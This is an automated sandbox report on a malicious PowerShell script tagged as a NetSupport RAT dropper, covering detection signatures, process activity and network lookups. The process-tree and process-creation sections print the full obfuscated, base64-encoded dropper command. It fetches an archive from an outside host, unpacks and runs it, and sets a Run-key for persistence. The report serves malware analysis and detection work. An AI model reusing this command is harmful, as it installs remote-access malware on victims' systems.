Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
loc.ps1

Overview

General Information

Sample Name:loc.ps1
Analysis ID:876995
MD5:d7bd6a17466dbe1e448956b0018ad94d
SHA1:a9d50d22cc9024dc6bd3297286783ef4b38d6f99
SHA256:5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669
Tags:netsupportps1rat
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6560 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAEMAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: loc.ps1Virustotal: Detection: 22%Perma Link
Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ObsoletessAt
Source: unknownDNS traffic detected: query: usherskenya.co.ke replaycode: Server failure (2)
Source: powershell.exe, 00000000.00000002.479156997.00000281D1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.470180866.00000281D1C47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.473249087.00000281B9C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.441829103.00000229AC1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000003.435183245.00000229AD753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://usherskenya.co.ke/forms/view.php8F

System Summary

barindex
Very long command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4854Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5707CA22_2_00007FF9A5707CA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A570D3C52_2_00007FF9A570D3C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A570DE432_2_00007FF9A570DE43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5700D302_2_00007FF9A5700D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A57080AF2_2_00007FF9A57080AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9A5700CD02_2_00007FF9A5700CD0
Source: loc.ps1Virustotal: Detection: 22%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220Jump to behavior
